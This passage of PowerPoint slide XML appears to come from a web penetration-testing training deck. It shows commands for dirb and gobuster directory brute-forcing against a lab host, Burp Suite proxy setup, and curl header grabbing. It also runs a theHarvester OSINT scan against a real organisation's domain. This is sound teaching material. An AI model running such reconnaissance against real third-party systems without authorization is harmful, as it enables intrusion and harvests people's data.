            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0193D717-0697-D94F-801B-4EA9379FCA8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Commandline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tool similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dirbuster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://dojo-basic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>seclists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Discovery/Web-Content/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>common.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="948625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r="-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811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8E38-28BE-0144-8511-D4AD0E78B3D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burp Suite - Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F4A8FC0-8D05-EB4E-B051-AF805BB706D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Launch Burp Suite application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select the Proxy tab and then the Options tab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set the IP address and Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check the Running checkbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select the Intercept tab under Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click the Intercept is X button. The button label should say “Intercept is off”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Browser: Edit-&gt;Preferences-&gt;General-&gt;Network Proxy-&gt;Settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select Manual proxy configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set HTTP Proxy to: 127.0.01 Port: 8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check Use this proxy server for all protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44234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3A8A-B40A-5041-9BD0-1CB8A5DF7EC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browse Web Application	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28056E31-39EF-2F46-BE26-12E1D9D4D63C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Browser navigate to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://dojo-basic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Burp, select Target tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Right click on dojo-basic in the tree and click add to scope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spider has been removed from the community edition so use ZAP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or similar tool to crawl the site. Hint, you can set the proxy in the command line for some tools so the tree tab is populated in Burp. If the tool doesn’t support proxy arguments Burp can also be ran as a SOCKS Proxy – User Options-&gt;Connections tab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292758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8122-BBA1-B24B-8725-8AF1570C9BC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TheHarvester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D68CC0A6-FEF3-AD45-A931-2C7B86C84105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OSINT: Opensource Intelligence tool that attempts to get emails, names, subdomains, IPs, and URLs using multiple public data sources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scans the following public sources:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>baidu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bingapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>certspotter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>crtsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnsdumpster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, dogpile, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>duckduckgo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-code, google, hunter, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>intelx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linkedin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linkedin_links</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcraft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>otx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>securityTrails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>spyse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(disabled for now), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>threatcrowd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, twitter, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>virustotal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, yahoo, all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some sources require API keys: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>googleCSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, hunter, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>intelx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>securityTrails,shodan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theHarvester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -b baidu,bing,certspotter,dnsdumpster,dogpile,duckduckgo,google,hunter,linkedin,netcraft,threatcrowd,trello,twitter,virustotal,yahoo -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar_org_harvest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8067420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100000"/>
                <a:alpha val="100000"/>
                <a:satMod val="140000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="31000">
              <a:schemeClr val="bg1">
                <a:tint val="100000"/>
                <a:shade val="90000"/>
                <a:alpha val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="bg1">
                <a:tint val="100000"/>
                <a:shade val="80000"/>
                <a:alpha val="100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4F239-EE48-E142-9072-018F1DD15EDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1333500"/>
            <a:ext cx="2426016" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A0AB62C-AA97-AF40-892E-9DC63FD5A36F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3171463" y="1333500"/>
            <a:ext cx="5362937" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -u http://dojo-basic -w /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seclists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Discovery/Web-Content/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>common.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -e -l -s '200,204,301,302,307,401,403,500' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://127.0.0.1:8082</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>View the tree tab inside Burp Suite. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Validate Show only in-scope items, and Hide not-found items are checked in the Filter for Target-&gt;Site Map</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E63B3A6-8102-2D49-930F-205355B5F182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="228866"/>
            <a:ext cx="7924800" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spider – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> With Proxy Through Burp Suite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="938209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A8DB-5AA3-6A4D-BA48-40E2AC34D8A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Headers – Root Of Site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF7F1E8-B8BA-1E46-BB3C-493D4D1B1348}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># curl -I http://dojo-basic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Date: Wed, 30 Oct 2019 04:47:10 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache/2.4.7 (Ubuntu)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X-Powered-By: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP/5.5.9-1ubuntu4.14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Type: text/html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91315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D7E-98C9-B946-AE30-FD95B132B786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browse HTML, JS, CSS Files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
